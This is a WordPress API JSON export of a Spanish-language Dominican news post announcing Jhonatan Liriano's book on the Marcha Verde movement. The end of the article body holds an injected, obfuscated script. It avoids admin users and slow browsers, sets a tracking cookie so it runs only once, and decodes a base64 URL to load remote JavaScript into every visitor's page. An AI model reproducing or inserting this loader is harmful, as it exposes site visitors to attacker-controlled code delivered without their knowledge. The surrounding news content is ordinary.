{"id":13440,"date":"2023-01-18T14:15:02","date_gmt":"2023-01-18T18:15:02","guid":{"rendered":"https:\/\/yanessiespinal.com\/?p=13440"},"modified":"2023-01-18T14:15:02","modified_gmt":"2023-01-18T18:15:02","slug":"a-seis-anos-del-surgimiento-de-la-marcha-verde-el-comunicador-y-actual-dirigente-del-partido-frente-amplio-jhonatan-liriano-pondra-a-circular-este-lunes-23-de-enero-un-libro-en-el-que-relata-su-exp","status":"publish","type":"post","link":"https:\/\/enterarterd.com\/?p=13440","title":{"rendered":"Jhonatan Liriano publicar\u00e1 libro sobre Marcha Verde"},"content":{"rendered":"<p>A seis a\u00f1os del surgimiento de la Marcha Verde, el comunicador y actual dirigente del partido Frente Amplio, Jhonatan Liriano, pondr\u00e1 a circular este lunes 23 de enero un libro en el que relata su experiencia y detalles hasta ahora in\u00e9ditos del proceso de construcci\u00f3n, expansi\u00f3n y direcci\u00f3n del \u201cmovimiento social m\u00e1s importante de lo que va del siglo XXI en Rep\u00fablica Dominicana\u201d.<\/p>\n<p>El acto de puesta en circulaci\u00f3n \u201cMarcha Verde: Apuntes para la Historia\u201d se llevar\u00e1 a cabo el pr\u00f3ximo lunes 23 de enero, a las 6:00 p.m., en el paraninfo de la Facultad de Ciencias Jur\u00eddicas de la Universidad Aut\u00f3noma de Santo Domingo (UASD), a pocos metros del lugar donde se realizaron las asambleas originarias del colectivo.<\/p>\n<p>En el libro Liriano describe los desaf\u00edos que enfrent\u00f3 el movimiento para hacerse mayoritario y evitar ser desarticulado por el gobierno del presidente Danilo Medina. Tambi\u00e9n explica la relaci\u00f3n de Marcha Verde con los partidos pol\u00edticos y las organizaciones sociales, adem\u00e1s de los mecanismos de financiamiento que se utilizaron para movilizar a cientos de miles de personas en todas las regiones del pa\u00eds y en el extranjero durante dos a\u00f1os consecutivos.<\/p>\n<p>\u201cEn este libro les comparto los aspectos que considero m\u00e1s importantes de lo que fue mi experiencia personal (otros contar\u00e1n la suya)<\/p>\n<p>en ese proceso triunfante de nuestro pueblo. Tambi\u00e9n dejo por escrito los aprendizajes que, a mi juicio, pude acumular en dos a\u00f1os de trabajo social y pol\u00edtico\u201d, explica Liriano en la presentaci\u00f3n del libro.<\/p>\n<p>El pr\u00f3logo de la obra est\u00e1 a cargo de la maestra Mar\u00eda Teresa Cabrera, quien fuera integrante de la coordinaci\u00f3n del movimiento y de la comisi\u00f3n nacional de Organizaci\u00f3n.<\/p>\n<p>Marcha Verde: Apuntes para la Historia podr\u00e1 adquirirse en formato f\u00edsico y digital a partir del lunes 23 de enero.<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>A seis a\u00f1os del surgimiento de la Marcha Verde, el comunicador y actual dirigente del partido Frente Amplio, Jhonatan Liriano, pondr\u00e1 a circular este lunes 23 de enero un libro en el que relata su experiencia y detalles hasta ahora in\u00e9ditos del proceso de construcci\u00f3n, expansi\u00f3n y direcci\u00f3n del \u201cmovimiento social m\u00e1s importante de lo [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":13443,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":{"0":"post-13440","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacionales"},"_links":{"self":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13440","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13440"}],"version-history":[{"count":0,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13440\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/media\/13443"}],"wp:attachment":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13440"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13440"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13440"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}